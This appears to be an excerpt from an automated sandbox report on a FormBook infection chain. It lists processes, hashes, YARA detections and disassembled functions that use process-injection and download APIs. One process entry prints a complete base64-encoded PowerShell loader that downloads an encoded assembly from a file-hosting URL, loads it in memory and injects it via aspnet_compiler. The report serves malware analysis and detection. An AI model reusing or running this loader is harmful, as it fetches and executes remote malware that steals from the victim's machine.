Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:37:56
Start date:	02/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE7FE.tmp" "c:\Users\user\AppData\Local\Temp\rll3hpdk\CSC65BF9AAB75645B3826CB5BF8CE44730.TMP"
Imagebase:	0x460000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:38:03
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Imagebase:	0xcb0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:38:03
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Imagebase:	0xcd0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:38:03
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:38:30
Start date:	02/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0xb30000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.1651008436.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.1651008436.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Function 068B0FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1245751228.00000000068B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_68b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: abe1abba06b1a32bf8cd2db9aae8b0afa2024aa42459579d727530ab15a0f3ca
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 068B0FD7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1245751228.00000000068B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_68b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: abe1abba06b1a32bf8cd2db9aae8b0afa2024aa42459579d727530ab15a0f3ca
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 068B0FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1245751228.00000000068B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_68b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: abe1abba06b1a32bf8cd2db9aae8b0afa2024aa42459579d727530ab15a0f3ca
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 7704, Parent PID: 7652COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.5%
Total number of Nodes:	58
Total number of Limit Nodes:	7

Executed Functions

Function 046B7A18 Relevance: 1.9, APIs: 1, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1351946746.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83088823db1aa0b34a590ff67f7a647c2f5f2e65b7d683a4781d3904be79142f
Instruction ID: f6608776a04c6f8778575705fd519f201f6021fc93b1d99ee602bd9ce2e78c2e
Opcode Fuzzy Hash: 83088823db1aa0b34a590ff67f7a647c2f5f2e65b7d683a4781d3904be79142f
Instruction Fuzzy Hash: DCE1F875A01219AFDB05CF98D484ADEBBB2FF88310F248159E855AB361D771ED82CF90

Function 074E4610 Relevance: 7.9, Strings: 6, Instructions: 439
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84j, xrefs: 074E486A
84j, xrefs: 074E495B
84j, xrefs: 074E494F
84j, xrefs: 074E476D
84j, xrefs: 074E4779
84j, xrefs: 074E485E

Memory Dump Source

Source File: 00000003.00000002.1356655211.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 84j$84j$84j$84j$84j$84j
API String ID: 0-2754170925
Opcode ID: dc3130dfc44d4b51b406096dd0e1bfcb738fa85745756454cf68aa38b6719137
Instruction ID: c1d3ba96aaa6063dfdd0596cbd7b5d14ca4f827d9706c9cdfd645683b635fcf8
Opcode Fuzzy Hash: dc3130dfc44d4b51b406096dd0e1bfcb738fa85745756454cf68aa38b6719137
Instruction Fuzzy Hash: 40F10A75B00255AFDB148F68C400BAABBB6FFC9321F24846AF905AB351DB71ED41CB91

Function 074E45AC Relevance: 4.0, Strings: 3, Instructions: 251
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84j, xrefs: 074E494F
84j, xrefs: 074E476D
84j, xrefs: 074E485E

Memory Dump Source

Source File: 00000003.00000002.1356655211.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 84j$84j$84j
API String ID: 0-2085296574
Opcode ID: 240772dc6a5708ee323294bc3381bd22f89bbb5e8a6e5af306dff5f73025a6e8
Instruction ID: d4b4071c54ef341feea85ad515b720d6be1c3d6c1b0c135dc8b29a2af5b79c70
Opcode Fuzzy Hash: 240772dc6a5708ee323294bc3381bd22f89bbb5e8a6e5af306dff5f73025a6e8
Instruction Fuzzy Hash: 8791F4B4A003859FDB14CF5CC440BAABBB6BF89321F25846AF915AB351DB71EC41CB91

Function 074E45F4 Relevance: 4.0, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84j, xrefs: 074E494F
84j, xrefs: 074E476D
84j, xrefs: 074E485E

Memory Dump Source

Source File: 00000003.00000002.1356655211.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 84j$84j$84j
API String ID: 0-2085296574
Opcode ID: 4e3e263e4bfba67a09705a3ac6623bef07ea557a00cc3eed48c60b8dc87c6576
Instruction ID: 933eb023c8a6a4297dccb07b6972e412c99d64fba8787784066f57e4cf76f96d
Opcode Fuzzy Hash: 4e3e263e4bfba67a09705a3ac6623bef07ea557a00cc3eed48c60b8dc87c6576
Instruction Fuzzy Hash: 1991F2B4B00245AFDB14CF5CC440BAAB7B6BB89321F25846AF915AB351DB71EC41CB91

Function 074E04F8 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84j, xrefs: 074E052F
84j, xrefs: 074E0523

Memory Dump Source

Source File: 00000003.00000002.1356655211.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 84j$84j
API String ID: 0-172764315
Opcode ID: a126071caa6888ed55f2da117a8de9e4e2c5a7d2f718e5f7b13e325fa3d31056
Instruction ID: 69a010d4bda0e85afa831c213aa7dfb8f0a78cf76d5ee2468f0dbabe08032457
Opcode Fuzzy Hash: a126071caa6888ed55f2da117a8de9e4e2c5a7d2f718e5f7b13e325fa3d31056
Instruction Fuzzy Hash: AD518AB17003119FEB208B68881076BBBE6EF85721F25845BE559EF392DAB1DC41C7A1

Function 046B1BF8 Relevance: 1.6, APIs: 1, Instructions: 68
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 046B7E99

Memory Dump Source

Source File: 00000003.00000002.1351946746.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: d47f46affb6dcc57a10f44bf1f42d474e5efe8533cf06a124093717e2dcb6867
Instruction ID: 44ae8739bb18a123dd5a85172e0be39c45c9cc2e493aae58b2dce1f2f9e99458
Opcode Fuzzy Hash: d47f46affb6dcc57a10f44bf1f42d474e5efe8533cf06a124093717e2dcb6867
Instruction Fuzzy Hash: 6F21F3B5D01619EFCB10CF9AD884ADEFBB4FF48310F10812AE918A7350D374AA55CBA0

Function 074E2062 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1356655211.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b445c4068144c3666af362244b7fef50728a506eea06b5607eec714f54ab96
Instruction ID: 5c1aa05e861009ed496b9b713cc2bd35dba6e2156ca507a15ae8d66b9c143349
Opcode Fuzzy Hash: 25b445c4068144c3666af362244b7fef50728a506eea06b5607eec714f54ab96
Instruction Fuzzy Hash: 1F0168F2F01611CFF625966448017AE676ABBC1629B00046ACA01AF381DEB54D22C3DB

Function 02E2D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1351255778.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2e2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9f68250ce407fc666ec3add2d46b7430aa34477b535db7e7d120d9948dfbd29
Instruction ID: 36df6a9ae056a0694012e6bee7f6cc096d1d2dfa9279486ae2479a9ce21e6cee
Opcode Fuzzy Hash: a9f68250ce407fc666ec3add2d46b7430aa34477b535db7e7d120d9948dfbd29
Instruction Fuzzy Hash: CB015E6244E3D45FE7128B258C94B52BFB4DF43228F1DC1DBD9888F1A3C2695849CBB2

Function 02E2D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1351255778.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2e2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b995a08a852e5f3a3e9c4ef103b6e52abfb1acc9fe421888f7fe785436186b71
Instruction ID: 8a690e78c1cd225cc9b4d5ae2d0ae56933e8c696b4b41b8b648415cfec9cf62d
Opcode Fuzzy Hash: b995a08a852e5f3a3e9c4ef103b6e52abfb1acc9fe421888f7fe785436186b71
Instruction Fuzzy Hash: 48012B314443549EF7104E15CC84F67FB98DF81628F08D01AEE4A5F192C7B89889CAF2

Analysis Process: powershell.exePID: 3520, Parent PID: 3048COMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	62.2%
Total number of Nodes:	37
Total number of Limit Nodes:	3

Executed Functions

Function 04DD87D0 Relevance: 6.7, APIs: 4, Instructions: 667
memoryprocessthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 04DD8A8A
VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04DD8B2C

Part of subcall function 04DD7334: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18E12514,00000000,?,?,?,00000000,00000000,?,04DD8B8F,?,00000000,?), ref: 04DD9404

ResumeThread.KERNELBASE(?), ref: 04DD8DAF
CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04DD9114

Memory Dump Source

Source File: 0000000D.00000002.1614506617.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4dd0000_powershell.jbxd

Similarity

API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
String ID:
API String ID: 4270437565-0
Opcode ID: 00cab00b7e045014cbc5c30db8eff0048bdaa529d9b43dfba8a8ba889d2c2381
Instruction ID: 4616223b05c49cb0e3c1be9eb831e83a21fd5a2ec63eb04e318c2ffde9b8ccb3
Opcode Fuzzy Hash: 00cab00b7e045014cbc5c30db8eff0048bdaa529d9b43dfba8a8ba889d2c2381
Instruction Fuzzy Hash: E0429170A00219DFEB25EF69C854BADB7B2BF44300F1480AAE419EB390DB35AD85DF55

Function 04DD7FF4 Relevance: .6, Instructions: 619
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1614506617.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 064b94b7c174591e0526172049b1732c0431cc8d665edd9f36c33270dd8cbd95
Instruction ID: e38b7a648fac3571990cc1651d73e8c5c911f36b8659a1e6028f03af3565888e
Opcode Fuzzy Hash: 064b94b7c174591e0526172049b1732c0431cc8d665edd9f36c33270dd8cbd95
Instruction Fuzzy Hash: EE918134B002189FDB19BB78885477E7BB2BBC8300F05852DE556E7388DE35EC06A7A1

Function 04DD7310 Relevance: 1.7, APIs: 1, Instructions: 156
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04DD9114

Memory Dump Source

Source File: 0000000D.00000002.1614506617.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4dd0000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5b6e4c45397c94a218a5fa0d7a41e6aa693e45ef96702c66b2f3ea464daf181f
Instruction ID: 7659b6a8a89559c682683a0420fb88e198cb4faa14e1c40c4dd557c74604ec7e
Opcode Fuzzy Hash: 5b6e4c45397c94a218a5fa0d7a41e6aa693e45ef96702c66b2f3ea464daf181f
Instruction Fuzzy Hash: 135128B1D01229DFEB24CF99C840BDDBBB5BF48314F1080AAE908B7240D775AA84CF90

Function 04DD9380 Relevance: 1.6, APIs: 1, Instructions: 65
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,18E12514,00000000,?,?,?,00000000,00000000,?,04DD8B8F,?,00000000,?), ref: 04DD9404

Memory Dump Source

Source File: 0000000D.00000002.1614506617.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4dd0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 77019644d98064e061f08ffc903c1122a0b19eaae87ba6341c43d2fe1802d5a9
Instruction ID: 47e2352517201cc87e2b7eee8c9c4b247e7deef530603ccdec36b5a82da35ca6
Opcode Fuzzy Hash: 77019644d98064e061f08ffc903c1122a0b19eaae87ba6341c43d2fe1802d5a9
Instruction Fuzzy Hash: F221F5B5901309DFDB10CF9AD885BDEBBF4FB48320F14842AE918A7250D379A544CBA5

Function 04DD7334 Relevance: 1.6, APIs: 1, Instructions: 63
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,18E12514,00000000,?,?,?,00000000,00000000,?,04DD8B8F,?,00000000,?), ref: 04DD9404

Memory Dump Source

Source File: 0000000D.00000002.1614506617.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4dd0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 147423677afab6e8300002cc4a1a8bc631046cf2f161c02d504b28e25f56e80f
Instruction ID: c16a62b69b75f20f45cc5acb2cdcb64f1092869308c5a37bcbc253fe22aba176
Opcode Fuzzy Hash: 147423677afab6e8300002cc4a1a8bc631046cf2f161c02d504b28e25f56e80f
Instruction Fuzzy Hash: 3E2104B1901349DFDB10CF9AC885BDEBBF4FB48320F10842AE918A7250D379A944CBA5

Function 04DD9209 Relevance: 1.6, APIs: 1, Instructions: 59
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04DD8943), ref: 04DD927B

Memory Dump Source

Source File: 0000000D.00000002.1614506617.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4dd0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 2f6651400c9b289afb3a850b76e695a1ee003e47f3103d8571975a9a980e6dab
Instruction ID: a89b0549f585aabe115442441f75f9e29b3786979c251944a2f1437599698b0b
Opcode Fuzzy Hash: 2f6651400c9b289afb3a850b76e695a1ee003e47f3103d8571975a9a980e6dab
Instruction Fuzzy Hash: 621129B6D002498FDB10DF9AD845BDEFFF4EB88320F14816AD468A3600D779A545CFA5

Function 04DD7340 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04DD8943), ref: 04DD927B

Memory Dump Source

Source File: 0000000D.00000002.1614506617.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4dd0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ea9aea8ede36d54d29e11901146dae8ec330904502a2b2398fcff9ed85d8ffd2
Instruction ID: b5607bda43845eb0e50846f5a11a46260edb061a430702d10e83dbf401c6ab4d
Opcode Fuzzy Hash: ea9aea8ede36d54d29e11901146dae8ec330904502a2b2398fcff9ed85d8ffd2
Instruction Fuzzy Hash: 5F1126B2D002498FDB10CF9AC844BDEBBF4EB88320F54846AE468B3600D379A545CFA5

Function 04DD731C Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04DD8943), ref: 04DD927B

Memory Dump Source

Source File: 0000000D.00000002.1614506617.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4dd0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 751888381100ed501c7155b3f1fd96542aa368572f2f34d004bb468233f4301c
Instruction ID: 04abec0bff6d82d365f38d07edd2040e6b21b8023dba815706d298a8698c0426
Opcode Fuzzy Hash: 751888381100ed501c7155b3f1fd96542aa368572f2f34d004bb468233f4301c
Instruction Fuzzy Hash: 521126B2D002498FDB10CF9AC844BDEBBF4EB88320F54846AE468B3700D379A545CFA5

Function 07CC1F18 Relevance: .5, Instructions: 453
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1650959775.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98a11059968a18f3aaaa99f7723e93ada5dd24d8a4028a1e5917f18190e3e94f
Instruction ID: 71198702a79b05c667b0e93b7f3584abf2d24990744d16e264d844e683f322b2
Opcode Fuzzy Hash: 98a11059968a18f3aaaa99f7723e93ada5dd24d8a4028a1e5917f18190e3e94f
Instruction Fuzzy Hash: 1FF115B1B0430ADFEB14DF69C8847AABBA2FF85210F14C0AED515DB251DB71CA85CB91

Function 07CC09C8 Relevance: .4, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1650959775.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa3762a23c9f310ba66d5c89f0dea37b7f46a11907bcb32a841f9a38ca2b5c33
Instruction ID: a753af707ceea4b6acfc06a650a69e8ad9bf552ace49ced2e30e04cf1aa64169
Opcode Fuzzy Hash: fa3762a23c9f310ba66d5c89f0dea37b7f46a11907bcb32a841f9a38ca2b5c33
Instruction Fuzzy Hash: F7C14AB1700306DFEB24DA658C9076ABBA1AFC1614F24807ED846DB352EE71DAC5C762

Function 07CC13A0 Relevance: .3, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1650959775.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33cc035db414d6084ace6e256e9c423e350067875a61dd853cd3466d5b776b6
Instruction ID: 3e7ad87d406c9bbc0e36583c80e2d3b35643b87553255a10abd05f89ff55c5df
Opcode Fuzzy Hash: b33cc035db414d6084ace6e256e9c423e350067875a61dd853cd3466d5b776b6
Instruction Fuzzy Hash: 0CB10AF1B0430ADFDB25CA6B84507BABBA2EF81611F2C806ED516DB253EB35CA41C751

Function 07CC1810 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1650959775.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a855db9656e7dfc607af7b2be9ab1a1eab6ddd75f82bd94d6f47fb33cf8c7578
Instruction ID: 34a8675d5d57b3503642b8acf7b906a29f81cb57acf3903d7902bd9a4af54867
Opcode Fuzzy Hash: a855db9656e7dfc607af7b2be9ab1a1eab6ddd75f82bd94d6f47fb33cf8c7578
Instruction Fuzzy Hash: 8B5162B4A00208DFEB14CB95C594B9EBBF2EF89314F1980A9D5056F351CB72DE81CB96

Function 07CC17F4 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1650959775.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f40470e801a5671b705f11cf69945b47a8f2aaaa2319999acb5e49f623a37a29
